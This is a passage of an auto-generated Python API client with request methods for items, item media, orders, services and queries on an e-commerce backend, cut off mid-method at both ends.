(data) = self.item_get_with_http_info(id, **kwargs)
return data
def item_get_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Item ID to open. (required)
:return: Item
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `item_get`")
resource_path = '/item/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Item',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_media_delete(self, imageurl, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_media_delete(imageurl, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str imageurl: URL of image to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_media_delete_with_http_info(imageurl, **kwargs)
else:
(data) = self.item_media_delete_with_http_info(imageurl, **kwargs)
return data
def item_media_delete_with_http_info(self, imageurl, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_media_delete_with_http_info(imageurl, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str imageurl: URL of image to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['imageurl']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_media_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'imageurl' is set
if ('imageurl' not in params) or (params['imageurl'] is None):
raise ValueError("Missing the required parameter `imageurl` when calling `item_media_delete`")
resource_path = '/item-media/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'imageurl' in params:
query_params['imageurl'] = params['imageurl']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_media_post(self, id, image, **kwargs):
"""
This endpoint is currently in testing.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_media_post(id, image, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Valid item id to bind image to. (required)
:param file image: Image. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_media_post_with_http_info(id, image, **kwargs)
else:
(data) = self.item_media_post_with_http_info(id, image, **kwargs)
return data
def item_media_post_with_http_info(self, id, image, **kwargs):
"""
This endpoint is currently in testing.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_media_post_with_http_info(id, image, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Valid item id to bind image to. (required)
:param file image: Image. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'image']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_media_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `item_media_post`")
# verify the required parameter 'image' is set
if ('image' not in params) or (params['image'] is None):
raise ValueError("Missing the required parameter `image` when calling `item_media_post`")
resource_path = '/item-media/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
if 'image' in params:
local_var_files['image'] = params['image']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data', 'application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_put(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_put(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: item id to update. (required)
:param ItemRequest item: New item information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_put_with_http_info(id, item, **kwargs)
else:
(data) = self.item_put_with_http_info(id, item, **kwargs)
return data
def item_put_with_http_info(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_put_with_http_info(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: item id to update. (required)
:param ItemRequest item: New item information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'item']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `item_put`")
# verify the required parameter 'item' is set
if ('item' not in params) or (params['item'] is None):
raise ValueError("Missing the required parameter `item` when calling `item_put`")
resource_path = '/item/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'item' in params:
body_params = params['item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def items_count_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_count_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: float
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.items_count_post_with_http_info(**kwargs)
else:
(data) = self.items_count_post_with_http_info(**kwargs)
return data
def items_count_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_count_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: float
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['minprice', 'maxprice', 'query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method items_count_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/items/count/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'minprice' in params:
query_params['minprice'] = params['minprice']
if 'maxprice' in params:
query_params['maxprice'] = params['maxprice']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='float',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def items_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.items_post_with_http_info(**kwargs)
else:
(data) = self.items_post_with_http_info(**kwargs)
return data
def items_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['minprice', 'maxprice', 'query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method items_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/items/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'minprice' in params:
query_params['minprice'] = params['minprice']
if 'maxprice' in params:
query_params['maxprice'] = params['maxprice']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Item]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def orders_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against item invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.orders_post_with_http_info(**kwargs)
else:
(data) = self.orders_post_with_http_info(**kwargs)
return data
def orders_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against item invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method orders_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/orders/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def orders_services_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_services_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against service invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.orders_services_post_with_http_info(**kwargs)
else:
(data) = self.orders_services_post_with_http_info(**kwargs)
return data
def orders_services_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_services_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against service invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method orders_services_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/orders/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def query_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.query_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float page: Current page index.
:param str categoryid: Get items under specified category id.
:param str sort: Comma delimited Sort string. ie ; +ordprice. Please use number based fields only
:param str search: Performs a regex pattern match against the items within your account
:param float minprice: Min price in hundreds (cents).
:param float maxprice: Max price in hundreds (cents).
:param ItemRequest query: Custom parameters to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.query_post_with_http_info(**kwargs)
else:
(data) = self.query_post_with_http_info(**kwargs)
return data
def query_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.query_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float page: Current page index.
:param str categoryid: Get items under specified category id.
:param str sort: Comma delimited Sort string. ie ; +ordprice. Please use number based fields only
:param str search: Performs a regex pattern match against the items within your account
:param float minprice: Min price in hundreds (cents).
:param float maxprice: Max price in hundreds (cents).
:param ItemRequest query: Custom parameters to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'categoryid', 'sort', 'search', 'minprice', 'maxprice', 'query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method query_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/query/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page' in params:
query_params['page'] = params['page']
if 'categoryid' in params:
query_params['categoryid'] = params['categoryid']
if 'sort' in params:
query_params['sort'] = params['sort']
if 'search' in params:
query_params['search'] = params['search']
if 'minprice' in params:
query_params['minprice'] = params['minprice']
if 'maxprice' in params:
query_params['maxprice'] = params['maxprice']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Item]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_delete(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of the service to update (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_delete_with_http_info(id, **kwargs)
else:
(data) = self.services_delete_with_http_info(id, **kwargs)
return data
def services_delete_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of the service to update (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `services_delete`")
resource_path = '/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_get(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Service]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_get_with_http_info(**kwargs)
else:
(data) = self.services_get_with_http_info(**kwargs)
return data
def services_get_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Service]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_get" % key
)
params[key] = val
del params['kwargs']
resource_path = '/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Service]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_open_get(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_open_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of service to open (required)
:return: Service
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_open_get_with_http_info(id, **kwargs)
else:
(data) = self.services_open_get_with_http_info(id, **kwargs)
return data
def services_open_get_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_open_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of service to open (required)
:return: Service
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_open_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `services_open_get`")
resource_path = '/services/open/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Service',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_post(self, service, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_post(service, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ServiceRequest service: Service to create. (required)
:return: Service
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_post_with_http_info(service, **kwargs)
else:
(data) = self.services_post_with_http_info(service, **kwargs)
return data
def services_post_with_http_info(self, service, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_post_with_http_info(service, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ServiceRequest service: Service to create. (required)
:return: Service
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['service']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'service' is set
if ('service' not in params) or (params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `services_post`")
resource_path = '/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'service' in params:
body_params = params['service']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Service',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_put(self, id, service, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_put(id, service, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of the service to update (required)
:param ServiceRequest service: New service data to set. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_put_with_http_info(id, service, **kwargs)
else:
(data) = self.services_put_with_http_info(id, service, **kwargs)
return data
def services_put_with_http_info(self, id, service, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_put_with_http_info(id, service, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of the service to update (required)
:param ServiceRequest service: New service data to set. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'service']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `services_put`")
# verify the required parameter 'service' is set
if ('service' not in params) or (params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `services_put`")
resource_path = '/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'service' in params:
body_params = params['service']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def variation_delete(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: variation id to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
